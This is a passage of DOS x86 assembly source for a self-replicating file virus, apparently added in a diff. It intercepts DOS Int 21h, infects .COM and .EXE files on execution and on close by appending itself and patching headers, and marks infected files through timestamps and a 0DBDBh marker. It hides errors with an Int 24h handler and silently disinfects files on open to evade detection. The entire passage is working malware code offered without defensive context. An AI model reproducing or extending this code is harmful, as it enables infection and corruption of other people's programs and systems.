+ jnz exec_time_ok ;nope, file not infected + jmp exec_exit3 ;FILE INFECTED + +exec_time_ok: and word ptr cs:[old_time],0ffe0h ;reset second bits + or word ptr cs:[old_time],dx ;seconds=day of month + + mov ax,4200h ;reset ptr to beginning + xor cx,cx ;(as opened files may + xor dx,dx ; have ptr anywhere, + call calldos21 ; so be smart!) + + mov word ptr cs:[marker],0DBDBh ;File Infection marker + mov dx,offset ds:[buffer] ;ds:dx buffer + mov cx,18h ;read 18h bytes + mov ah,3fh ;read from handle + call calldos21 ;call dos + + jc exec_exit1 ;error? if yes jmp + sub cx,ax ;did we read 18h bytes? + jnz exec_exit1 ;if no exit + mov dx,cx ;cx=0 dx=0 + mov ax,4202h ;jmp to EOF + call calldos21 ;call dos + + jc exec_exit1 ;error? exit if so. + mov word ptr cs:[filesize+2],ax ;save lower 16bit fileSz + mov word ptr cs:[filesize],dx ;save upper 16bit fileSz + call chkbuf ;check if .exe + jz exec_cool ;jmp if .exe file + cmp ax,0FFF0h - virus_size ;64k-256-virus < 64k? + jb exec_cool ;if less jmp! + +exec_exit1: jmp exec_exit3 ;exit! + +;_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- +; Mutate and infect +;-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_ + +exec_cool: mov dx,offset init_virus ;ds:dx=virus beginning + mov cx,virus_size ;cx=virus size + mov ah,40h ;write to handle + call calldos21 ;call dos + + jc exec_exit1 ;error? if yes exit + sub cx,ax ;cx=ax bytes? 
+ jnz exec_exit1 ;not equal exit + mov dx,cx ;cx=0 dx=0 + mov ax,4200h ;jmp to top of file + call calldos21 ;call dos + + jc exec_exit1 ;error, then exit + mov ax,word ptr cs:[filesize+2] ;ax=lower 16bit fileSize + call chkbuf ;check if .exe + jnz exec_com_file ;if !=.exe jmp + mov dx,word ptr cs:[filesize] ;get upper 16bit + + mov cx,4 ;cx=0004 + mov si,word ptr cs:[buffer+8] ;get exe header size + shl si,cl ;mul by 16 + sub ax,si ;exe_header - filesize + sbb dx,0h ;sub with carry + + mov cx,10h ;cx=0010 + div cx ;ax=length in para + ;dx=remaider + mov word ptr cs:[buffer+20],dx ;New IP offset address + mov word ptr cs:[buffer+22],ax ;New CS (In paragraphs) + add dx,virus_size+100h ;Dx=virus_size+256 + + mov word ptr cs:[buffer+16],dx ;New SP entry + mov word ptr cs:[buffer+14],ax ;New SS (in para) + add word ptr cs:[buffer+10],(virus_size)/16+1 ;min para + mov ax,word ptr cs:[buffer+10] ;ax=min para needed + cmp ax,word ptr cs:[buffer+12] ;cmp with max para + jb exec_size_ok ;jmp if ok! + mov word ptr cs:[buffer+12],ax ;nop, enter new max + +exec_size_ok: mov ax,word ptr cs:[buffer+2] ;ax=file size + add ax,virus_size ;add virus to it + push ax ;push it + and ah,1 ; + mov word ptr cs:[buffer+2],ax ;restore new value + pop ax ;pop ax + mov cl,9 ; + shr ax,cl ; + add word ptr cs:[buffer+4],ax ;enter fileSz + header + mov dx,offset buffer ;ds:dx=new exe header + mov cx,18h ;cx=18h bytes to write + jmp SHORT exec_write_it ;jmp... 
+ +exec_com_file: sub ax,3 ;sub 3 for jmp address + mov word ptr cs:[buffer+1],ax ;store new jmp value + mov byte ptr cs:[buffer],0E9h ;E9h=JMP + mov dx,offset buffer ;ds:dx=buffer + mov cx,3 ;cx=3 bytes + +exec_write_it: mov ah,40h ;write to file handle + call calldos21 ;call dos + + mov dx,word ptr cs:[old_date] ;restore old date + mov cx,word ptr cs:[old_time] ;restore old time + mov ax,5701h ;write back to file + call calldos21 ;call dos + +exec_exit3: mov ah,3eh ;close file + call calldos21 ;call dos + +exec_exit2: pop dx ;restore es:bx (the + pop ds ;original int_24) + mov ax,2524h ;put back to place + call calldos21 ;call dos + + pop ds + pop es + pop di ;pop registers + pop si + pop dx + xor cx,cx + mov cl,byte ptr cs:[attrib] ;get old file attrib + mov ax,4301h ;put them back + call calldos21 ;call dos + pop cx + pop bx + pop ax + + cmp byte ptr cs:[close],0 ;get called by exec? + je exec_good_bye ;yep, then jmp + iret ;else exit now. + +exec_good_bye: mov dx,word ptr cs:[ax_reg] ;restore dx + iret ;iret +;------------------------------------------------------------------------------- +; Close File Int21h/ah=3Eh +;------------------------------------------------------------------------------- +close_file: cmp bx,4h ;file handler > 4? + ja close_cont ;jmp if above + jmp int21call ;else exit + +close_cont: push ax ;save 'em + push bx + push cx + push dx + push si + push di + push es + push ds + + push bx ;save file handler + mov ax,1220h ;get job file table! 
+ int 2fh ;call multiplex + ;es:di=JFT for handler + mov ax,1216h ;get system file table + mov bl,es:[di] ;bl=SFT entry + int 2fh ;call multiplex + pop bx ;save file handler + + add di,0011h + mov byte ptr es:[di-0fh],02h ;set to read/write + + add di,0017h + cmp word ptr es:[di],'OC' ;check for .COM file + jne closing_next_try ;no try next ext + cmp byte ptr es:[di+2h],'M' ;check last letter + je closing_cunt3 ;no, file no good, exit + +closing_exit: jmp closing_nogood ;exit + +closing_next_try: + cmp word ptr es:[di],'XE' ;check for .EXE file + jne closing_exit ;no, exit + cmp byte ptr es:[di+2h],'E' ;check last letter + jne closing_exit ;no, exit + +closing_cunt3: mov byte ptr cs:[close],1 ;set closing flag + mov word ptr cs:[handle],bx ;save handler + jmp closing_infect ;infect file! + +closing_nogood: pop ds ;restore 'em + pop es + pop di + pop si + pop dx + pop cx + pop bx + pop ax + jmp int21call ;good bye, baby... +;------------------------------------------------------------------------------- +; Execute Disinfecting routine +;------------------------------------------------------------------------------- +exec_disinfect1 PROC + push ax ;save registers + push bx + push cx + push dx + push ds + + mov ax,4300h ;get file attribs + call calldos21 ;call dos + + test cl,1h ;is Read-only flag? + jz okay_dis ;no, jmp attribs ok + dec cx ;turn off bit 0 + mov ax,4301h ;write new attribs + call calldos21 ;call dos + jnc okay_dis ;No error? then jmp + jmp end_dis ;error? exit! + +okay_dis: mov ax,3d02h ;open file for r/w + call calldos21 ;call dos + jnc dis_fileopen ;No error? then jmp + jmp end_dis ;Error? exit! + +dis_fileopen: xchg bx,ax ;bx=file handle + mov ax,5700h ;get file time/date + call calldos21 ;call dos + + mov word ptr cs:[old_time],cx ;save file time + mov word ptr cs:[old_date],dx ;save file date + and cx,1fh ;unmask second field + and dx,1fh ;unmask date field + xor cx,dx ;are they equal? 
+ jnz half_way ;nope, file not infected
+
+ mov ax,4202h ;jmp to EOF
+ xor cx,cx ;cx=0
+ xor dx,dx ;dx=0
+ call calldos21 ;call dos
+
+ push cs ;cs=ds
+ pop ds ;
+ mov cx,dx ;dx:ax=file size
+ mov dx,ax ;save to cx:dx
+ push cx ;save upper fileSz
+ push dx ;save lower fileSz
+
+ sub dx,1Ch ;filesize-1C=origin byte
+ sbb cx,0 ;sub with carry
+ mov ax,4200h ;position ptr
+ call calldos21 ;call dos
+
+ mov ah,3fh ;open file
+ mov cx,1Ch ;read last 1Ch bytes
+ mov dx,offset org_time ;put in ds:dx
+ call calldos21 ;call dos
+ call chkbuf ;Did it work?
+ je half ;Yes,Jmp
+ cmp word ptr ds:[marker],0DBDBh ;File REALLY Infected?
+ je half ;Yes, then jmp
+
+ pop dx
+ pop cx
+half_way: jmp end_dis1 ;exit, error!
+
+half: xor cx,cx ;cx=0
+ xor dx,dx ;dx=0
+ mov ax,4200h ;pointer to top of file
+ call calldos21 ;call dos
+
+ mov ah,40h ;write function
+ mov dx,offset buffer ;ds:dx=buffer
+ mov cx,18h ;cx=18h bytes to write
+ call chkbuf ;check if .exe?
+ jz SHORT dis_exe_jmp ;yupe, jmp
+ mov cx,3h ;else write 3 bytes
+dis_exe_jmp: call calldos21 ;call dos
+
+ pop dx ;pop original fileSz
+ pop cx
+
+ sub dx,virus_size ;Sub with virus_size
+ sbb cx,0 ;sub with carry
+ mov ax,4200h ;ptr top of virus
+ call calldos21 ;call dos
+
+ mov ah,40h ;write function
+ xor cx,cx ;write 0 bytes
+ call calldos21 ;call dos! (new EOF)
+
+ mov cx,word ptr ds:[org_time] ;get original time
+ mov dx,word ptr ds:[old_date] ;get original date
+ mov ax,5701h ;put back to file
+ call calldos21 ;call dos
+
+end_dis1: mov ah,3eh ;close file handle
+ call calldos21 ;call dos
+
+end_dis: pop ds ;restore values
+ pop dx
+ pop cx
+ pop bx
+ pop ax
+ ret
+exec_disinfect1 ENDP
+;-------------------------------------------------------------------------------
+; Open File by DOS Int21h/ah=6ch
+;-------------------------------------------------------------------------------
+open_ext_file: push dx ;save DX
+ mov dx,si ;asciiz=DS:DX now
+ jmp open_ext ;jmp
+;-------------------------------------------------------------------------------
+; Open File by DOS Int21h/ah=3Dh
+;-------------------------------------------------------------------------------
+open_file: push dx ;save dx (asciiz)
+open_ext: call check_extension ;check extension
+ cmp byte ptr cs:[com_ext],1 ;is it a .com?
+ je open_ok_ext ;yep, then jmp
+ cmp byte ptr cs:[exe_ext],1 ;is it a .exe?
+ je open_ok_ext ;yep, them jmp
+ jmp open_exit ;ext no good, exit!
+
+open_ok_ext: call exec_disinfect1 ;disinfect file!
+open_exit: pop dx ;restore dx
+ jmp int21call ;exit to dos...
+;-------------------------------------------------------------------------------
+; Checks Buffer (EXE) Header
+;-------------------------------------------------------------------------------
+chkbuf PROC
+ push si ;save register
+ mov si,word ptr cs:[buffer] ;get first word
+ cmp si,5A4Dh ;si=ZM?
+ je chkbuf_ok ;if yes exit
+ cmp si,4D5Ah ;si=MZ?
+chkbuf_ok: pop si ;pop register
+ ret
+chkbuf ENDP
+;-------------------------------------------------------------------------------
+; Check file Extension
+;-------------------------------------------------------------------------------
+check_extension PROC
+ pushf ;save flags
+ push cx ;save cx,si
+ push si
+ mov si,dx ;ds:[si]=asciiz
+ mov cx,128 ;scan 128 bytes max
+ mov byte ptr cs:[com_ext],0 ;reset .com flag
+ mov byte ptr cs:[exe_ext],0 ;reset .exe flag
+
+check_ext: cmp byte ptr ds:[si],2Eh ;scan for "."
+ je check_ext1 ;jmp if found
+ inc si ;else inc and loop
+ loop check_ext ;loop me
+
+check_ext1: inc si ;inc asciiz ptr
+ cmp word ptr ds:[si],'OC' ;is it .COM
+ jne check_ext2 ; ~~
+ cmp byte ptr ds:[si+2],'M' ;is it .COM
+ je com_file_ext ; ~
+
+check_ext2: cmp word ptr ds:[si],'oc' ;is it .com
+ jne check_ext3 ; ~~
+ cmp byte ptr ds:[si+2],'m' ;is it .com
+ je com_file_ext ; ~
+
+check_ext3: cmp word ptr ds:[si],'XE' ;is it .EXE
+ jne check_ext4 ; ~~
+ cmp byte ptr ds:[si+2],'E' ;is it .EXE
+ je exe_file_ext ; ~
+
+check_ext4: cmp word ptr ds:[si],'xe' ;is it .exe
+ jne check_ext_exit ; ~~
+ cmp byte ptr ds:[si+2],'e' ;is it .exe
+ je exe_file_ext ; ~
+ jmp check_ext_exit ;neither exit
+
+com_file_ext: mov byte ptr cs:[com_ext],1 ;found .com file
+ jmp SHORT check_ext_exit ;jmp short
+exe_file_ext: mov byte ptr cs:[exe_ext],1 ;found .exe file
+
+check_ext_exit: pop si ;restore
+ pop cx
+ popf ;save flags
+ ret
+
+com_ext db 0 ;flag on=.com file
+exe_ext db 0 ;flag on=.exe file
+check_extension ENDP
+;-------------------------------------------------------------------------------
+; Original Int21h
+;-------------------------------------------------------------------------------
+calldos21 PROC
+ pushf ;fake int call
+ call dword ptr cs:[int21] ;call original int_21
+ ret
+calldos21 ENDP
+;===============================================================================
+; Int 24h Handler
+;===============================================================================
+int24_handler:
+ mov al,3 ;don't report error...
+ iret ;later dude...
+;-------------------------------------------------------------------------------
+; FLAGS - FLAGS - FLAGS - FLAGS - FLAGS
+
+close db 0 ;closing file
+
+;-------------------------------------------------------------------------------
+; END - END - END - END - END - END - END
+
+rand_val dw 0
+flags dw 0 ;Flags are saved here
+attrib db 0 ;file's attrib
+filesize dd 0 ;filesize
+handle dw 0 ;file handler
+old_date dw 0 ;file date
+old_time dw 0 ;file time
+;-------------------------------------------------------------------------------
+org_time dw 0 ;original file time
+
+;-------------------------------------------------------------------------------
+buffer db 0CDh,020h ; 0 (0) EXE file signature
+ db 090h,090h ; 2 (2) Length of file
+ db 090h,090h ; 4 (4) Size of file + header (512k)
+ db 090h,090h ; 6 (6) # of relocation items
+ db 090h,090h ; 8 (8) Size of header (16byte para)
+ db 090h,090h ; A (10) Min para needed (16byte)
+ db 090h,090h ; C (12) Max para needed (16byte)
+ db 090h,090h ; E (14) SS reg from start in para.
+ db 090h,090h ; 10(16) SP reg at entry
+ db 090h,090h ; 12(18) checksum
+ db 090h,090h ; 14(20) IP reg at entry
+ db 090h,090h ; 16(22) CS reg from start in para.
+Marker db 0DBh,0DBh ; Marks THIS File as INFECTED!
+last:
+seg_a ends
+ end start
